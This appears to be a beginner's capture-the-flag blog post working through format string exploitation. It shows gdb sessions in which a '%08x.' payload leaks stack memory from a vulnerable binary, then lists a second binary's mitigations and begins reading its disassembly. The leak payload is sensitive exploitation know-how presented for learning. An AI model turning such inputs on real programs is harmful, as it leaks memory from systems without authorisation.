format string3(beginner) in Solving the problem(B)
How low. Let's solve the problem(B).
Well, i wanna test to whether it is true that the printf(%08x.%08x....) 's
esp output following printf 's esp or not.
0x0804850c <+136>: lea eax,[esp+0x2c] 0x08048510 <+140>: mov DWORD PTR [esp],eax 0x08048513 <+143>: call 0x8048398 <printf@plt> ; printf(test) 0x08048518 <+148>: mov DWORD PTR [esp],0x8048649 0x0804851f <+155>: call 0x80483a8 <puts@plt> 0x08048524 <+160>: mov ecx,DWORD PTR ds:0x804a020 0x0804852a <+166>: mov edx,DWORD PTR ds:0x804a020 (gdb) b *main+143 Note: breakpoint 1 also set at pc 0x8048513. Breakpoint 2 at 0x8048513: file fmt_vuln.c, line 20. (gdb) r $(python -c 'print "%08x."*30') Starting program: /root/ctf/fmt_vuln $(python -c 'print "%08x."*30') True Text %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x. False Text Breakpoint 1, 0x08048513 in main (argc=2, argv=0xbffff434) at fmt_vuln.c:20 20 printf(text); (gdb) i r $esp esp 0xbfffef50 0xbfffef50 (gdb) ni 22 puts(""); (gdb) 0x0804851f 22 puts(""); (gdb) x/10xw $esp 0xbfffef50: 0x08048649 0xbffff5b9 0x00154d7c 0x00154d7c 0xbfffef60: 0x00154d7c 0x000000f0 0x000000f0 0xbffff434 0xbfffef70: 0x00000004 0x00000004 (gdb) ni bffff5b9.00154d7c.00154d7c.00154d7c.000000f0.000000f0.bffff434.00000004.00000004.00000174.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.
i want you notice that
>>0xbfffef50: 0x08048649 0xbffff5b9 0x00154d7c 0x00154d7c
and
>>bffff5b9.00154d7c.00154d7c.00154d7c.000000f0
i mean, the memory slip out a one place!!
i cannot understand...
What is " 0x08048649" meaning.
Well, in the first, i have to check the source code and understand the problem which have any mitigations to prevent solving.the first mitigation is Randomized addresses of the program (-pie). PIE feature loads executable binaries at random memory addresses so that the kernel can disallow text relocation. i wanna read this blog after read source code. and next, we are to be care the mitigation is Protected the stack (-fstack-protector-all), i will use as this reference(site). IPA is God. next mitigation is Made GOT read-only (-Wl,-z,relro,-z,now), this means , we cannot to use GOT overwrite exploit, conversely we think, the possibilities will be decreased. the last one is Ascii armor is enabled. you check this mitigation
% objdump -d -M intel villager|grep -A40 main.: 000008b0 <main>: 8b0: 55 push ebp 8b1: 89 e5 mov ebp,esp 8b3: 83 e4 f0 and esp,0xfffffff0 8b6: 83 ec 20 sub esp,0x20 8b9: 65 a1 14 00 00 00 mov eax,gs:0x14 8bf: 89 44 24 1c mov DWORD PTR [esp+0x1c],eax 8c3: 31 c0 xor eax,eax 8c5: c7 04 24 2c 0a 00 00 mov DWORD PTR [esp],0xa2c 8cc: e8 fc ff ff ff call 8cd <main+0x1d> 8d1: a1 00 00 00 00 mov eax,ds:0x0 8d6: 89 04 24 mov DWORD PTR [esp],eax 8d9: e8 fc ff ff ff call 8da <main+0x2a> 8de: 66 90 xchg ax,ax 8e0: c7 04 24 03 00 00 00 mov DWORD PTR [esp],0x3 8e7: e8 fc ff ff ff call 8e8 <main+0x38> 8ec: e8 ff fe ff ff call 7f0 <_Z4convv> 8f1: 84 c0 test al,al 8f3: 74 eb je 8e0 <main+0x30> 8f5: c7 04 24 34 0a 00 00 mov DWORD PTR [esp],0xa34 8fc: e8 fc ff ff ff call 8fd <main+0x4d> 901: a1 00 00 00 00 mov eax,ds:0x0 906: 89 04 24 mov DWORD PTR [esp],eax 909: e8 fc ff ff ff call 90a <main+0x5a> 90e: 31 c0 xor eax,eax 910: 8b 54 24 1c mov edx,DWORD PTR [esp+0x1c] 914: 65 33 15 14 00 00 00 xor edx,DWORD PTR gs:0x14 91b: 75 02 jne 91f <main+0x6f> 91d: c9 leave 91e: c3 ret 91f: 90 nop 920: e8 fc ff ff ff call 921 <main+0x71>
ok, i try splitting the source code into readable for any people.
1.These are likely to mean "Function Prototype", so we can ignore these.
I'd direct attention into sub esp,0x20, this means that the variables in this source will exist 0x20( 32 )bytes.
8b0: 55 push ebp 8b1: 89 e5 mov ebp,esp 8b3: 83 e4 f0 and esp,0xfffffff0 8b6: 83 ec 20 sub esp,0x20 ...omission... 91d: c9 leave 91e: c3 ret 91f: 90 nop 920: e8 fc ff ff ff call 921 <main+0x71>
2.
8b9: 65 a1 14 00 00 00 mov eax,gs:0x14 8bf: 89 44 24 1c mov DWORD PTR [esp+0x1c],eax 8c3: 31 c0 xor eax,eax 8c5: c7 04 24 2c 0a 00 00 mov DWORD PTR [esp],0xa2c 8cc: e8 fc ff ff ff call 8cd <main+0x1d>